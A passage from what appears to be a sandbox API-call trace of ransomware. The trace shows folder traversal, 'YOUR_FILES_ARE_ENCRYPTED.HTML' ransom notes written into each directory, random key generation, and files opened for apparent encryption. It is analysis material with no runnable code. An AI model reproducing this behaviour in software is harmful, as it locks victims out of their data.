GetProcessHeap () returned 0x600000 [0115.547] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bioenrollment_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.547] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.548] CloseHandle (hObject=0x32c) returned 1 [0115.548] GetProcessHeap () returned 0x600000 [0115.548] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.548] GetProcessHeap () returned 0x600000 [0115.548] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.549] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f0d99c3, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f0d99c3, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f0d99c3, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy", cAlternateFileName="MICROS~1.0_N")) returned 1 [0115.549] StrStrIW (lpFirst="Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.549] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy") returned 146 [0115.549] GetProcessHeap () returned 0x600000 [0115.549] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.549] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy" [0115.549] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\*" [0115.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f0d99c3, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f0d99c3, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f0d99c3, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.550] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f0d99c3, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f0d99c3, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f0d99c3, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="..", cAlternateFileName="")) returned 1 [0115.550] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f0d99c3, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f0ffcee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f0ffcee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0115.550] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.550] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore") returned 162 [0115.550] GetProcessHeap () returned 0x600000 [0115.550] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.551] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore" [0115.551] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\*" [0115.551] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f0d99c3, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f0ffcee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f0ffcee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x627860, dwReserved1=0x315e000, cFileName=".", cAlternateFileName="")) returned 0x626978 [0115.552] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f0d99c3, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f0ffcee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f0ffcee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x627860, dwReserved1=0x315e000, cFileName="..", cAlternateFileName="")) returned 1 [0115.552] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f0d99c3, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f1e4a00, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f1e4a00, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x627860, dwReserved1=0x315e000, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0115.553] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.553] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned 182 [0115.553] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0115.553] lstrlenW (lpString=".dat") returned 4 [0115.553] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0115.553] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0115.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bioenrollment_cw5n1h2txyewy\\microsoft.bioenrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0115.553] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=8192) returned 1 [0115.553] GetProcessHeap () returned 0x600000 [0115.553] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0115.556] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="5E") returned 2 [0115.556] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="67") returned 2 [0115.556] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="EE") returned 2 [0115.556] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="99") returned 2 [0115.556] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="BD") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="9F") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="49") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="54") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="38") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="BB") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="3B") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="DD") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="EB") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="E9") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="AB") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="A1") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="8C") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="21") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="47") returned 2 [0115.556] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="65") returned 2 [0115.556] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="E9") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="57") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="E7") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="10") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="5B") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="9C") returned 2 [0115.556] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="B6") returned 2 [0115.556] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="2A") returned 2 [0115.556] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="E7") returned 2 [0115.556] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="F0") returned 2 [0115.557] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="0D") returned 2 [0115.557] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="51") returned 2 [0115.557] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" [0115.557] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0115.557] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0115.557] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4f0ffcee, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f0ffcee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f0ffcee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x627860, dwReserved1=0x315e000, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0115.557] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.557] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG1") returned 187 [0115.557] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0115.557] lstrlenW (lpString=".LOG1") returned 5 [0115.557] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0115.557] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4f0ffcee, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f0ffcee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f0ffcee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x627860, dwReserved1=0x315e000, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0115.557] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.557] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG2") returned 187 [0115.557] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0115.557] lstrlenW (lpString=".LOG2") returned 5 [0115.557] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0115.557] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4f0ffcee, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f0ffcee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f0ffcee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x627860, dwReserved1=0x315e000, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0115.558] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0115.558] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 192 [0115.558] GetProcessHeap () returned 0x600000 [0115.558] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.558] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bioenrollment_cw5n1h2txyewy\\microsoft.bioenrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.560] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.561] CloseHandle (hObject=0x324) returned 1 [0115.561] GetProcessHeap () returned 0x600000 [0115.561] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.561] GetProcessHeap () returned 0x600000 [0115.561] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.561] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f0d99c3, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f0ffcee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f0ffcee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0115.561] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.561] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 176 [0115.561] GetProcessHeap () returned 0x600000 [0115.561] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.561] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Microsoft.BioEnrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bioenrollment_cw5n1h2txyewy\\microsoft.bioenrollment_10.0.10586.0_neutral__cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.567] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.568] CloseHandle (hObject=0x32c) returned 1 [0115.568] GetProcessHeap () returned 0x600000 [0115.568] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.568] GetProcessHeap () returned 0x600000 [0115.568] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.569] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e77658a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e77658a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e77658a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0115.569] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.569] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\RoamingState") returned 99 [0115.569] GetProcessHeap () returned 0x600000 [0115.569] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.570] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\RoamingState" [0115.570] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\RoamingState\\*" [0115.570] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e77658a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e77658a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e77658a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName=".", cAlternateFileName="")) returned 0x626778 [0115.571] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e77658a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e77658a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e77658a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="..", cAlternateFileName="")) returned 1 [0115.571] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e77658a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e77658a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e77658a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="..", cAlternateFileName="")) returned 0 [0115.571] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0115.571] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, 